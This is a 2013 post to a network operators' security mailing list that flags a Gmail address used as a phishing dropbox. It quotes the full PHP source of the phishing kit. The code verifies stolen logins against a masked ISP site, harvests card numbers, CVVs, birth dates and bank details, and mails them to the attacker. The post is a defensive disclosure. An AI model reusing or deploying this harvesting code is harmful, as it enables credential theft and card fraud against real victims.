[nsp-sec] Google dropbox

Helge Aksdal helge.aksdal at telenor.com
Mon Feb 11 05:15:25 EST 2013 

Hi,

The e-mail address shootermoney87 at gmail.com is used as a dropbox in a phishing
campaign.

| <?php
| $myemail = "shootermoney87 at gmail.com"; //Dir ton email Hna
| error_reporting(1);
| function doRequest($method, $url, $referer, $agent, $cookie, $vars) {
|     $ch=curl_init();
|     curl_setopt($ch, CURLOPT_URL, $url);
|     if($referer != "") {
|         curl_setopt($ch, CURLOPT_REFERER, $referer);
|     }
|     curl_setopt($ch, CURLOPT_USERAGENT, $agent);
|     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
|     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|     curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
|     curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
|    if ($method == 'POST') {
|         curl_setopt($ch, CURLOPT_POST, 1);
|         curl_setopt($ch, CURLOPT_POSTFIELDS, $vars);
|     }
|     if (substr($url, 0, 5) == "https") {
|         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
|         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
|     }
| 
|     $data = curl_exec($ch);
|     curl_close($ch);
| 
|     if ($data) {
|         return $data;
|     }
| 
| }
| 
| function get($url, $referer, $agent, $cookie) {
|     return doRequest('GET', $url, $referer, $agent, $cookie, 'NULL');
| }
| 
| function post($url, $referer, $agent, $cookie,  $vars) {
|     return doRequest('POST', $url, $referer, $agent, $cookie, $vars);
| }
| 
| parse_str($_SERVER['QUERY_STRING']);
| $log="log.php";
| $ver="index.php";
| 
| if($cmd=="log"){
| $random=rand(1, 100000);
| $cookie=$random . ".php";
| $agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)";
| 
| $referrer="http://www.xxxxxx[.]xx";
| $vars="appId=ABONNESNEUF&loginUrl=https%3A%2F%2Fxxxxxx[.]xx%2Fmoncompte-webapp%2Fconnexion%2FloginAction.action&forwardUrl=https%3A%2F%2Fxxxxxx[.]xx%2Fmoncompte-webapp%2Fmoncompte%2FgererOffre%2FgererOffre.action%3FidSso%3D%23%23SSOID%23%23&login=".$_POST['login']."&password=".$_POST['password']."&x=57&y=10";
| $error=0;
| if($_POST['login']==""){
| $error=1;
| }
| 
| if($_POST['password']==""){
| $error=1;
| }
| if($error) {
| include $log;
| exit();
| }
| $url="http://www.xxxxxx[.]xx";
| $str= get($url, $referrer, $agent, $cookie);
| $url="https://xxxxxx[.]xx";
| $str= post($url, $referrer, $agent, $cookie, $vars);
| unlink($cookie);
| if(strstr($str, 'Votre Identifiant ou votre mot de passe est incorrect')) {
| $error=1;
| include $log;
| exit();
| }
| 
| $login=$_POST['login'];
| $password=$_POST['password'];
| include $ver;
| exit();
| }
| 
| if($cmd=="login"){
| include $log;
| exit();
| }
| 
| if($cmd=="verification") {
| $error = 0;
| 
| if (!is_numeric($_POST['cvv'])){
| $error = 1;
| $cvvclass="Warning";
| }
| 
| if (!is_numeric($_POST['cnum'])){
| $error = 1;
| $cnumclass="Warning";
| }
| 
| if (strlen($_POST['dobyear']) != 4){
| $error = 1;
| $dobyearclass="Warning";
| }
| $cc1cvv2 = $_POST['cvv'];
| $a = substr($_POST['cnum'],0,1);
| if($a == "3"){
| if (strlen($cc1cvv2) != 4){
| $error = 1;
| $cvvclass="Warning";
| }
| } elseif($a == "4") {
| if (strlen($cc1cvv2) != 3){
| $error = 1;
| $cvvclass="Warning";
| }
| } elseif($a == "5") {
| if (strlen($cc1cvv2) != 3){
| $error = 1;
| $cvvclass="Warning";
| }
| } elseif($a == "6") {
| if (strlen($cc1cvv2) != 3){
| $error = 1;
| $cvvclass="Warning";
| }
| }
| 
| if($_POST['name']==""){
| $nameclass="Warning";
| }
| if($_POST['address']==""){
| $addressclass="Warning";
| }
| if($_POST['city']==""){
| $cityclass="Warning";
| }
| if($_POST['zip']==""){
| $zipclass="Warning";
| }
| if($_POST['phone']==""){
| $phoneclass="Warning";
| }
| if($_POST['cmonth']==""){
| $cmonthclass="Warning";
| }
| if($_POST['cyear']==""){
| $cyearclass="Warning";
| }
| if($_POST['dobmonth']==""){
| $dobmonthclass="Warning";
| }
| if($_POST['dobday']==""){
| $dobdayclass="Warning";
| }
| if($_POST['dobyear']==""){
| $dobyearclass="Warning";
| }
| if($error)
| {
| include $ver;
| exit();
| }
| 
| $ip = getenv("REMOTE_ADDR");
| $hostname = gethostbyaddr($ip);
| $message .= "===================================================================\n";
| $message .= "Full Name                    : ".$_POST['name']."\n";
| $message .= "Billing Address                    : ".$_POST['address']."\n";
| $message .= "city                        : ".$_POST['city']."\n";
| $message .= "zip code                : ".$_POST['zip']."\n";
| $message .= "phone                   : ".$_POST['phone']."\n";
| $message .= "Saisissez les 11 chiffres de votre numÊro de compte : ".$_POST['Salvc']."\n";
| $message .= "Identifant de la banque : ".$_POST['salton']."\n";
| $message .= "Card Number                   : ".$_POST['cnum']."\n";
| $message .= "Expiration                    : ".$_POST['cmonth']."/".$_POST['cyear']."\n";
| $message .= "Cvv                          : ".$_POST['cvv']."\n";
| $message .= "Date of Birth          : ".$_POST['dobmonth']."/".$_POST['dobday']."/".$_POST['dobyear']."\n";
| $message .= "------   IP   ----\n";
| $address = $_POST['address'];
| $message .= "IP                : $ip\n";
| $timedate = $_POST['historys'];
| $message .= "===================================================================\n";
| $subject = "[D--K]- ".$_POST['cnum'];
| $headers = "From: |D-K|<>";
| mail($myemail,$subject,$message,$headers);
| mail($timedate,$subject,$message,$headers);
| header("Location: http://www.xxxxxx[.]xx/");
| }
| ?>

-- 
Helge Aksdal
Telenor

More information about the nsp-security mailing list